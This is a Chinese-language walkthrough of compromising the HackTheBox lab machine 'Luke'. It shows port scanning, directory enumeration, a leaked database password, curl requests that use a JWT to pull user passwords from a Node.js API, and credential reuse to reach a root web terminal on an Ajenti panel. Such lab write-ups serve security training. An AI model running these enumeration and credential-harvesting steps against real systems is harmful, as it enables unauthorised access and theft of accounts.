教你如何把HackTheBox裡面的Luke“幹掉”
與往常一樣,第一步是對主機進行Nmap識別正在執行的服務:
Nmap scan report for 10.10.10.137
Host is up (0.042s latency).
Not shown: 65464 closed ports, 66 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 512 Apr 14 12:35 webapp
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.13.75
| Logged in as ftp
| TYPE: ASCII
| No session upload bandwidth limit
| No session download bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3+ (ext.1) - secure, fast, stable
|_End of status
22/tcp open ssh?
80/tcp open http Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
|_http-title: Luke
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
8000/tcp open http Ajenti http control panel
|_http-title: Ajenti
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/13%OT=21%CT=1%CU=33830%PV=Y%DS=2%DC=T%G=Y%TM=5D52853
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=Z%II=RI%TS=21)O
OS:PS(O1=M54DNW6ST11%O2=M54DNW6ST11%O3=M54DNW6NNT11%O4=M54DNW6ST11%O5=M54DN
OS:W6ST11%O6=M54DST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)E
OS:CN(R=Y%DF=Y%T=40%W=FFFF%O=M54DNW6SLL%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F
OS:=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=FFFF%S=O%A=S+%F=AS%O=M54DNW6ST11%R
OS:D=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0
OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=40%CD=S)
Network Distance: 2 hops
TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 40.68 ms 10.10.12.1
2 40.94 ms 10.10.10.137
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4814.02 seconds
從該輸出中我們可以看到有很多開放的埠。我看到的第一個是FTP,因為它允許匿名登入。
root@kali:~/Documents/luke# ncftp 10.10.10.137
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Connecting to 10.10.10.137...
vsFTPd 3.0.3+ (ext.1) ready...
Logging in...
Login successful.
Logged in to 10.10.10.137.
ncftp / > ls
webapp/
ncftp / > cd webapp/
Directory successfully changed.
ncftp /webapp > ls
for_Chihiro.txt
ncftp /webapp > cat for_Chihiro.txt
Dear Chihiro !!
As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of
the actual website I've created .
Normally you should know where to look but hurry up because I will delete them soon because of our security policies !
Derry
ncftp /webapp >
如您所見,通過FTP託管了一個檔案。這是給千尋人的txt檔案。這似乎是FTP上所有可用的東西。接下來,我決定移至埠80。瀏覽至10.10.10.137以檢視託管的內容。
向我介紹了基本的Bootstrap 4頁。原始碼中沒有隱藏任何內容,頁面外也沒有連結。然後,我執行dirb來查詢伺服器上託管的其他目錄和檔案。
root@kali:~/Documents/luke# dirb http://10.10.10.137
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Aug 13 08:45:35 2019
URL_BASE: http://10.10.10.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.137/ ----
==> DIRECTORY: http://10.10.10.137/css/
+ http://10.10.10.137/index.html (CODE:200|SIZE:3138)
==> DIRECTORY: http://10.10.10.137/js/
+ http://10.10.10.137/LICENSE (CODE:200|SIZE:1093)
+ http://10.10.10.137/management (CODE:401|SIZE:381)
==> DIRECTORY: http://10.10.10.137/member/
==> DIRECTORY: http://10.10.10.137/vendor/
---- Entering directory: http://10.10.10.137/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.137/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.137/member/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.137/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Aug 13 09:02:59 2019
DOWNLOADED: 4612 - FOUND: 3
發現了目錄的集合。我還使用dirbuster重新掃描並找到了/login.php和config.php。由於某種原因而被dirb搶走了。
當我瀏覽到config.php時,將返回以下內容:
$dbHost = 'localhost'; $dbUsername = 'root'; $dbPassword = 'Zk6heYCyv6ZE9Xcg'; $db = "login"; $conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %s\n". $conn -> error);
現在,我們有了一個使用者名稱和密碼的根:Zk6heYCyv6ZE9Xcg。/管理是發現的其他重要外觀之一。當您瀏覽至此時,將顯示HTTP基本身份驗證欄位。目前在埠80上似乎沒有其他任何東西。因此,我隨後移至埠3000。
當您嘗試連線到它時,您會收到JSON響應:大約3000似乎是託管NodeJS應用的主機。
{"success":false,"message":"Auth token is not supplied"}
我在埠3000上執行dirb嘗試查詢其他內容。
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Tue Aug 13 11:36:44 BST 2019
--------------------------------
http://10.10.10.137:3000
--------------------------------
Directories found during testing:
Dirs found with a 200 response:
/login/
/users/
/
/Login/
/users/admin/
/Users/
/Users/admin/
/users/Admin/
/Users/Admin/
/LogIn/
/LOGIN/
--------------------------------
--------------------------------
所有這些目錄返回的JSON響應與原始目錄非常相似,表明您需要進行身份驗證。通過一番調查,我發現該應用程式正在使用JSON Web令牌。通過向身份驗證伺服器傳送包含正確的使用者名稱和密碼的請求。伺服器將使用令牌進行響應,然後可以使用令牌對應用程式進行身份驗證。經過大量的試驗和錯誤後,我可以使用以下序列生成令牌請求:
root@kali:/# curl -s -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' --data '{"username":"admin","password":"Zk6heYCyv6ZE9Xcg","rememberMe":false}' http://10.10.10.137:3000/login
{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM"}root@kali:/#
如您所見,我使用CURL將POST請求傳送到http://10.10.10.137:3000/login。POST請求中包含在埠80上找到的使用者名稱和密碼。伺服器以令牌密碼響應。然後,我使用curl將令牌轉發給應用程式。
root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000
{"message":"Welcome admin ! "}
root@kali:/#
傳送後,伺服器將顯示訊息“歡迎管理員!”。然後,我將同一令牌傳送到與dirb找到的埠3000上的其他目錄。
root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users
[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]
root@kali:/#
root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/admin
{"name":"Admin","password":"WX5b7)>/rp$U)FW"}
您可以看到/ users目錄響應了一個使用者名稱。管理員,德里,尤里和多莉。/users / admin目錄以Admin的使用者名稱和密碼作為響應。管理員:WX5b7)> / rp $ U) FW。然後,我將令牌傳送給/ users中的3個使用者。
root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/derry
{"name":"Derry","password":"rZ86wwLvx7jUxtch"}
root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/yuri
{"name":"Yuri","password":"bet@tester87"}
root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/dory
{"name":"Dory","password":"5y:!xa=ybfe)/QD"}
所以畢竟,我有5套憑證
- Dory:5y:!xa = ybfe)/ QD
- Yuri:bet @ tester87
- Derry:rZ86wwLvx7jUxtch
- Admin:WX5b7)> / rp $ U)FW
- root:Zk6heYCyv6ZE9Xcg
我回到埠80上的/管理,依次嘗試了每個時間表。Derry使用者能夠登入。從這裡,我們有一個目錄,列出了3個不同的檔案。Config.json,config.php和login.php 。我開啟config.json並顯示以下內容:
您可以從此JSON輸出中看到,我們現在有了另一個root使用者密碼。然後,我繼續探索8000埠。
這是用於管理伺服器的軟體。我嘗試使用前面的步驟中捕獲的6組替換登入。來自config.json的root登入名允許我登入到該頁面。
然後在計算機上生成Web瀏覽器終端會話。有了該終端的訪問許可權,我便可以將user.txt和root.txt都儲存起來以完成計算機。
# cd /root # ls .cache .cshrc .k5login .mysql_history .npm .wget-hsts .config .history .login .node_repl_history .profile root.txt # cat root.txt [REDACTED] # cd /home/ /home/derry # cd /home/derry /home/derry # cd /home/derry # ls .cshrc .login .login_conf .mail_aliases .mailrc .profile .shrc user.txt # cat user.txt [REDACTED] #
關注:Hunter網路安全 獲取更多資訊
網站:bbs.kylzrv.com
CTF團隊:Hunter網路安全
文章:Xtrato
排版:Hunter-匿名者
相關文章
- IT 如何把骨幹留住
- Spring Boot中如何幹掉if elseSpring Boot
- RabbitMQ裡面的routingkey是幹嘛用的????????MQ
- 幹掉安全員,Robotaxi的下一站是哪裡?
- 京滬高鐵是如何幹掉民航的?
- win10如何把開啟方式裡面不需要的程式刪掉Win10
- Java8的Optional:如何幹掉空指標?Java指標
- 該死的埠占用!教你用 Shell 指令碼一鍵幹掉它!指令碼
- 教你如何使用tcpkill殺掉tcp連線TCP
- HACKTHEBOX——Lame
- #HACKTHEBOX——Driver
- HACKTHEBOX——CraftyRaft
- 如何獲取 alter 裡面的字串?字串
- 【Mongo】使用killOp幹掉Long Running OperationGo
- js把陣列裡面的所有物件合併成一個物件JS陣列物件
- 如何驗證 elk 裡面的資料?
- 如何調整Docker裡面的Image 大小?Docker
- 翻山越嶺幹掉你!!什麼?叢集還會分裂?快來看看ES的腦裂把
- 想要影片裡的音樂,如何提取裡面的音訊?音訊
- 在Linux中,如何把系統中不用服務關掉?Linux
- 教你如何在溝通時把同事逼瘋
- QQ直播提醒怎麼關閉 簡單三步教你把qq直播提醒關掉
- 幹掉 “重複程式碼” 的技巧有哪些
- if else 太多?看我用 Java 8 輕鬆幹掉!Java
- 重構:幹掉有壞味道的程式碼
- Github 太狠了,居然把 "master" 幹掉了!GithubAST
- Go 裡面的 ^ 和 &^Go
- Linux 幹掉狀態為Z的殭屍程序Linux
- 用“資料驅動”幹掉遊戲策劃?遊戲
- 誰告訴你 Flutter 會幹掉原生開發?Flutter
- [20180606]如何dump資料庫裡面的漢字.txt資料庫
- Spring Boot 把 Maven 幹掉了,擁抱 Gradle!Spring BootMavenGradle
- 『京滬高鐵是如何幹掉民航的?』今日資料行業日報(2019.11.20)行業
- Electron團隊為什麼要幹掉remote模組REM
- 裁員潮來了要先幹掉DBA?DBA該如何穿越技術迭代週期?
- [譯] 面向無神論安卓開發:如何和為什麼要幹掉上帝物件安卓物件
- 請問如何把檔案中的空行過濾掉(要求命令列實現)命令列
- NET core 釋出時幹掉多餘的語言包-